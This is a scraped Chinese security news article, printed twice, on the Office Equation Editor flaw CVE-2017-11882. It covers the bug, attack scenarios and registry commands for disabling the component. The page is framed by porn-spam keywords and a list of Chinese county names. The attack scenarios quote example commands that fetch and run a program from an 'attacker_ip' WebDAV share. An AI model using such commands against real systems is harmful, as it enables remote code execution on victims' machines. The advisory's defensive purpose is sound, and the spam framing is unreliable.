精品国产一级在线观看,国产成人综合久久精品亚洲,免费一级欧美大片在线观看

當前位置:安全企業動態 → 正文

微軟Office曝存在17年之久的“全版本影響”老洞,無需用戶交互實現惡意程

責任編輯:editor004 作者:clouds |來源:企業網D1Net  2017-11-20 11:30:05 本文摘自:黑客與極客

當人們仍在著急處理“沒有補丁”的微軟MS Office內置DDE功能威脅時,有研究人員又發現了Office的另一個嚴重漏洞,攻擊者可以利用該漏洞,無需受害者用戶交互,遠程向目標系統植入惡意軟件。該漏洞屬于內存破壞型漏洞,可影響微軟過去17年發布的所有MS Office版本軟件,包括最新的Office 365,漏洞利用能成功在包括Windows 10在內的所有微軟Windows操作系統中實現。

漏洞信息

該漏洞由Embedi公司研究員發現,漏洞可導致遠程代碼執行、未授權認證繞過、無需用戶交互的遠程惡意程序植入。目前漏洞編號CVE-2017-11882,主要漏洞部件為Office中的自帶公式編輯器EQNEDT32.EXE。

由于不正確的內存操作,組件EQNEDT32.EXE會無法正確處理內存中的執行對象,這種破壞條件,致使攻擊者可在當前系統登錄用戶環境下,利用Office遠程植入惡意代碼或其它惡意程序。

微軟在Microsoft Office 2000中就引入了EQNEDT32.EXE組件,并保留至Microsoft Office 2007之后發布的所有Office 版本中,以確保新舊軟件的文檔兼容。

該漏洞的成功利用需要受害者用Office打開攻擊者特制的惡意文檔,如果與微軟的內核提權漏洞(如CVE-2017-11847)組合利用,攻擊者將會獲得受害者目標系統的完全控制權。以下視頻是在Windows 7,8,10系統中該漏洞的成功實現過程演示:

漏洞技術分析

詳情查看Embedi分析報告《微軟的難言之隱-你所不知道的漏洞》

可能的攻擊場景

Embedi研究者列舉了以下幾種該漏洞的可攻擊利用場景:

當插入一些OLE(對象鏈接嵌入)實體時,可能會觸發該漏洞,實現一些惡意命令的執行,如向某個攻擊者架設網站下載執行惡意程序等。

最直接有效的漏洞利用方式就是,訪問攻擊者架設或控制的WebDAV服務器,并執行其中的運行程序。

不過,攻擊者還能利用該漏洞執行cmd.exe /c start \attacker_ip f類似惡意命令,配合入侵或啟動WebClient服務。

另外,攻擊者還能使用諸如\attacker_ip f.exe的命令向受害者系統中執行惡意程序,惡意程序的啟動機制與\live.sysinternals.com ools service方式類似。

緩解和修復措施

在11月的補丁修復周期中,微軟針對該漏洞修改了EQNEDT32.EXE組件的內存處理機制,并發布了多個漏洞補丁更新,強烈建議用戶及時進行下載更新。

鑒于EQNEDT32.EXE組件的不確定隱患,我們建議用戶通過以下注冊表命令來對其進行禁用:

reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0400

如果在64位操作系統中安裝了32位的MS Office軟件,命令如下:

reg add “HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0400

關鍵字:WebClientwebdav攻擊者

本文摘自:黑客與極客

x 微軟Office曝存在17年之久的“全版本影響”老洞,無需用戶交互實現惡意程 掃一掃
分享本文到朋友圈
當前位置:安全企業動態 → 正文

微軟Office曝存在17年之久的“全版本影響”老洞,無需用戶交互實現惡意程

責任編輯:editor004 作者:clouds |來源:企業網D1Net  2017-11-20 11:30:05 本文摘自:黑客與極客

當人們仍在著急處理“沒有補丁”的微軟MS Office內置DDE功能威脅時,有研究人員又發現了Office的另一個嚴重漏洞,攻擊者可以利用該漏洞,無需受害者用戶交互,遠程向目標系統植入惡意軟件。該漏洞屬于內存破壞型漏洞,可影響微軟過去17年發布的所有MS Office版本軟件,包括最新的Office 365,漏洞利用能成功在包括Windows 10在內的所有微軟Windows操作系統中實現。

漏洞信息

該漏洞由Embedi公司研究員發現,漏洞可導致遠程代碼執行、未授權認證繞過、無需用戶交互的遠程惡意程序植入。目前漏洞編號CVE-2017-11882,主要漏洞部件為Office中的自帶公式編輯器EQNEDT32.EXE。

由于不正確的內存操作,組件EQNEDT32.EXE會無法正確處理內存中的執行對象,這種破壞條件,致使攻擊者可在當前系統登錄用戶環境下,利用Office遠程植入惡意代碼或其它惡意程序。

微軟在Microsoft Office 2000中就引入了EQNEDT32.EXE組件,并保留至Microsoft Office 2007之后發布的所有Office 版本中,以確保新舊軟件的文檔兼容。

該漏洞的成功利用需要受害者用Office打開攻擊者特制的惡意文檔,如果與微軟的內核提權漏洞(如CVE-2017-11847)組合利用,攻擊者將會獲得受害者目標系統的完全控制權。以下視頻是在Windows 7,8,10系統中該漏洞的成功實現過程演示:

漏洞技術分析

詳情查看Embedi分析報告《微軟的難言之隱-你所不知道的漏洞》

可能的攻擊場景

Embedi研究者列舉了以下幾種該漏洞的可攻擊利用場景:

當插入一些OLE(對象鏈接嵌入)實體時,可能會觸發該漏洞,實現一些惡意命令的執行,如向某個攻擊者架設網站下載執行惡意程序等。

最直接有效的漏洞利用方式就是,訪問攻擊者架設或控制的WebDAV服務器,并執行其中的運行程序。

不過,攻擊者還能利用該漏洞執行cmd.exe /c start \attacker_ip f類似惡意命令,配合入侵或啟動WebClient服務。

另外,攻擊者還能使用諸如\attacker_ip f.exe的命令向受害者系統中執行惡意程序,惡意程序的啟動機制與\live.sysinternals.com ools service方式類似。

緩解和修復措施

在11月的補丁修復周期中,微軟針對該漏洞修改了EQNEDT32.EXE組件的內存處理機制,并發布了多個漏洞補丁更新,強烈建議用戶及時進行下載更新。

鑒于EQNEDT32.EXE組件的不確定隱患,我們建議用戶通過以下注冊表命令來對其進行禁用:

reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0400

如果在64位操作系統中安裝了32位的MS Office軟件,命令如下:

reg add “HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0400

關鍵字:WebClientwebdav攻擊者

本文摘自:黑客與極客

電子周刊
回到頂部

關于我們聯系我們版權聲明隱私條款廣告服務友情鏈接投稿中心招賢納士

企業網版權所有 ©2010-2024 京ICP備09108050號-6 京公網安備 11010502049343號

^
  • <menuitem id="jw4sk"></menuitem>

    1. <form id="jw4sk"><tbody id="jw4sk"><dfn id="jw4sk"></dfn></tbody></form>
      主站蜘蛛池模板: 建湖县| 四会市| 西昌市| 曲水县| 龙岩市| 西城区| 衢州市| 泸西县| 阿拉善右旗| 文登市| 西畴县| 黄大仙区| 宣汉县| 玉田县| 穆棱市| 东阿县| 宁津县| 芮城县| 金川县| 永兴县| 西畴县| 新余市| 翁牛特旗| 顺昌县| 拜城县| 佳木斯市| 中山市| 革吉县| 孟连| 石狮市| 汉阴县| 石河子市| 宁安市| 新田县| 双流县| 株洲市| 虹口区| 罗平县| 梓潼县| 新闻| 霍山县|